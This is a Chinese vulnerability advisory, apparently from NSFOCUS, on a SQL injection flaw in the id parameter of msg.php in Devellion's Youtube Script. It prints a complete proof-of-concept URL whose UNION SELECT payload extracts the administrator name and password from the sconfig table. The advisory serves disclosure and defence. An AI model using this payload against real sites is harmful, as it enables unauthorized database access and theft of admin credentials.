安全研究
安全漏洞
Youtube Script id参数远程SQL注入漏洞
发布日期:2007-07-02
更新日期:2007-07-03
受影响系统:Devellion Limited Youtube script
描述:
BUGTRAQ ID:
24720
Youtube Script是用PHP编写的用于播放在线视频的脚本。
Youtube Script在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞控制应用系统或导致敏感信息泄露。
Youtube Script的msg.php脚本中没有正确地验证对id参数的输入,允许远程攻击者通过在提交的数据中插入SQL代码在有漏洞的站点非授权操作数据库。
<*来源:t0pP8uZz
xprog
链接:
http://secunia.com/advisories/25922/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*建议:
厂商补丁:
Devellion Limited
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hispah.com/index.php?act=viewProd&productId=20浏览次数:2677
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |